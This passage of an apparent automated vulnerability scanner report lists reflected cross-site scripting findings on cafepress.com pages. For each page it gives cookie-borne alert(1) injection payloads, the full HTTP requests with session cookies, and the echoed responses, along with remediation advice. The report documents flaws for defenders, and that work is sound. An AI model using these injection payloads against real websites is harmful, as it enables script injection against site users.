window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.54. http://www.cafepress.com/+ornaments [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+ornaments

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40a17"-alert(1)-"1b71678a13 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+ornaments HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA40a17"-alert(1)-"1b71678a13; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59006
Date: Sun, 26 Dec 2010 13:49:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:03 GMT; path=/
Set-Cookie: cp_sc=100180; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:03 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA40a17"-alert(1)-"1b71678a13";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.55. http://www.cafepress.com/+ornaments [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+ornaments

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65868</script><script>alert(1)</script>67d717b073a was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+ornaments HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=65868</script><script>alert(1)</script>67d717b073a; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 59029
Date: Sun, 26 Dec 2010 13:49:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:59 GMT; path=/
Set-Cookie: cp_sc=100180; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:59 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '65868</script><script>alert(1)</script>67d717b073a'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.56. http://www.cafepress.com/+posters [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+posters

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ddf8"-alert(1)-"05b70d2df26 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+posters HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA9ddf8"-alert(1)-"05b70d2df26; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 65624
Date: Sun, 26 Dec 2010 13:47:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:39 GMT; path=/
Set-Cookie: cp_sc=100165; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:39 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 65624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA9ddf8"-alert(1)-"05b70d2df26";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.57. http://www.cafepress.com/+posters [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+posters

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0c66</script><script>alert(1)</script>78957873d50 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+posters HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=c0c66</script><script>alert(1)</script>78957873d50; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 65646
Date: Sun, 26 Dec 2010 13:47:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:37 GMT; path=/
Set-Cookie: cp_sc=100165; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:37 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 65646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'c0c66</script><script>alert(1)</script>78957873d50'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.58. http://www.cafepress.com/+stadium-blanket [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+stadium-blanket

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7a90"-alert(1)-"b637a8bd2b7 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+stadium-blanket HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAf7a90"-alert(1)-"b637a8bd2b7; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59457
Date: Sun, 26 Dec 2010 13:49:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:17 GMT; path=/
Set-Cookie: cp_sc=201672; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:17 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAf7a90"-alert(1)-"b637a8bd2b7";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.59. http://www.cafepress.com/+stadium-blanket [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /+stadium-blanket

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71ca1</script><script>alert(1)</script>6e6e4d328ee was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /+stadium-blanket HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
